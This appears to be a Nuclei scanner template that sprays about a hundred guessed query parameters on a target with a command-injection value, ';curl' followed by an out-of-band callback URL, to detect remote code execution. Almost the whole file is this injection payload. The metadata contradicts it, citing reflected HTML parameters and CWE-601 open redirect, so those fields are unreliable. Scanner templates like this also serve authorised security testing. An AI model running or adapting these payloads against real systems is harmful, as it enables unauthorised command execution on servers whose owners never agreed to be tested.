http:
- matchers:
  - part: interactsh_protocol
    type: word
    words:
    - http
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?cmd=wwww%3Bcurl+{{interactsh-url}}&exec=wwww%3Bcurl+{{interactsh-url}}&command=wwww%3Bcurl+{{interactsh-url}}&execute=wwww%3Bcurl+{{interactsh-url}}&ping=wwww%3Bcurl+{{interactsh-url}}&query=wwww%3Bcurl+{{interactsh-url}}&code=wwww%3Bcurl+{{interactsh-url}}&do=wwww%3Bcurl+{{interactsh-url}}&run=wwww%3Bcurl+{{interactsh-url}}&shell=wwww%3Bcurl+{{interactsh-url}}&process=wwww%3Bcurl+{{interactsh-url}}&function=wwww%3Bcurl+{{interactsh-url}}&action=wwww%3Bcurl+{{interactsh-url}}&cli=wwww%3Bcurl+{{interactsh-url}}&task=wwww%3Bcurl+{{interactsh-url}}&arg=wwww%3Bcurl+{{interactsh-url}}&load=wwww%3Bcurl+{{interactsh-url}}&module=wwww%3Bcurl+{{interactsh-url}}&tool=wwww%3Bcurl+{{interactsh-url}}&script=wwww%3Bcurl+{{interactsh-url}}'
  - '{{BaseURL}}?exec_cmd=wwww%3Bcurl+{{interactsh-url}}&execute_cmd=wwww%3Bcurl+{{interactsh-url}}&system=wwww%3Bcurl+{{interactsh-url}}&shell_cmd=wwww%3Bcurl+{{interactsh-url}}&console=wwww%3Bcurl+{{interactsh-url}}&terminal=wwww%3Bcurl+{{interactsh-url}}&bash=wwww%3Bcurl+{{interactsh-url}}&sh=wwww%3Bcurl+{{interactsh-url}}&zsh=wwww%3Bcurl+{{interactsh-url}}&powershell=wwww%3Bcurl+{{interactsh-url}}&ps=wwww%3Bcurl+{{interactsh-url}}&cmd_exec=wwww%3Bcurl+{{interactsh-url}}&run_cmd=wwww%3Bcurl+{{interactsh-url}}&execute_shell=wwww%3Bcurl+{{interactsh-url}}&shell_exec=wwww%3Bcurl+{{interactsh-url}}&system_cmd=wwww%3Bcurl+{{interactsh-url}}&spawn=wwww%3Bcurl+{{interactsh-url}}&proc=wwww%3Bcurl+{{interactsh-url}}&debug=wwww%3Bcurl+{{interactsh-url}}&input=wwww%3Bcurl+{{interactsh-url}}'
  - '{{BaseURL}}?cmdline=wwww%3Bcurl+{{interactsh-url}}&execute_command=wwww%3Bcurl+{{interactsh-url}}&run_shell=wwww%3Bcurl+{{interactsh-url}}&invoke=wwww%3Bcurl+{{interactsh-url}}&call=wwww%3Bcurl+{{interactsh-url}}&operation=wwww%3Bcurl+{{interactsh-url}}&script_exec=wwww%3Bcurl+{{interactsh-url}}&trigger=wwww%3Bcurl+{{interactsh-url}}&execute_function=wwww%3Bcurl+{{interactsh-url}}&launch=wwww%3Bcurl+{{interactsh-url}}&start=wwww%3Bcurl+{{interactsh-url}}&payload=wwww%3Bcurl+{{interactsh-url}}&action_exec=wwww%3Bcurl+{{interactsh-url}}&process_exec=wwww%3Bcurl+{{interactsh-url}}&task_exec=wwww%3Bcurl+{{interactsh-url}}&workflow=wwww%3Bcurl+{{interactsh-url}}&background_task=wwww%3Bcurl+{{interactsh-url}}&automation=wwww%3Bcurl+{{interactsh-url}}&service_exec=wwww%3Bcurl+{{interactsh-url}}&handler=wwww%3Bcurl+{{interactsh-url}}'
  - '{{BaseURL}}?executeProcess=wwww%3Bcurl+{{interactsh-url}}&executeTask=wwww%3Bcurl+{{interactsh-url}}&execFunction=wwww%3Bcurl+{{interactsh-url}}&startProcess=wwww%3Bcurl+{{interactsh-url}}&startTask=wwww%3Bcurl+{{interactsh-url}}&runProcess=wwww%3Bcurl+{{interactsh-url}}&runTask=wwww%3Bcurl+{{interactsh-url}}&taskRunner=wwww%3Bcurl+{{interactsh-url}}&job=wwww%3Bcurl+{{interactsh-url}}&pipeline=wwww%3Bcurl+{{interactsh-url}}&flow=wwww%3Bcurl+{{interactsh-url}}&macro=wwww%3Bcurl+{{interactsh-url}}&shellRunner=wwww%3Bcurl+{{interactsh-url}}&processRunner=wwww%3Bcurl+{{interactsh-url}}&executeMacro=wwww%3Bcurl+{{interactsh-url}}&remoteExec=wwww%3Bcurl+{{interactsh-url}}&remoteCommand=wwww%3Bcurl+{{interactsh-url}}&execService=wwww%3Bcurl+{{interactsh-url}}&taskService=wwww%3Bcurl+{{interactsh-url}}&jobRunner=wwww%3Bcurl+{{interactsh-url}}'
  - '{{BaseURL}}?commandExec=wwww%3Bcurl+{{interactsh-url}}&taskCommand=wwww%3Bcurl+{{interactsh-url}}&runFunction=wwww%3Bcurl+{{interactsh-url}}&serviceCall=wwww%3Bcurl+{{interactsh-url}}&operationExec=wwww%3Bcurl+{{interactsh-url}}&startExecution=wwww%3Bcurl+{{interactsh-url}}&invokeCommand=wwww%3Bcurl+{{interactsh-url}}&callFunction=wwww%3Bcurl+{{interactsh-url}}&taskOperation=wwww%3Bcurl+{{interactsh-url}}&shellCommand=wwww%3Bcurl+{{interactsh-url}}&processHandler=wwww%3Bcurl+{{interactsh-url}}&executeHandler=wwww%3Bcurl+{{interactsh-url}}&runHandler=wwww%3Bcurl+{{interactsh-url}}&workflowExec=wwww%3Bcurl+{{interactsh-url}}&backgroundExec=wwww%3Bcurl+{{interactsh-url}}&remoteShell=wwww%3Bcurl+{{interactsh-url}}&dispatchTask=wwww%3Bcurl+{{interactsh-url}}&functionExec=wwww%3Bcurl+{{interactsh-url}}&serviceHandler=wwww%3Bcurl+{{interactsh-url}}&taskInvoker=wwww%3Bcurl+{{interactsh-url}}'


id: 6rcepost-40
info:
  author: erickfernandox_rce12
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 6rcepost
  severity: medium
  tags: fuzzer, generic
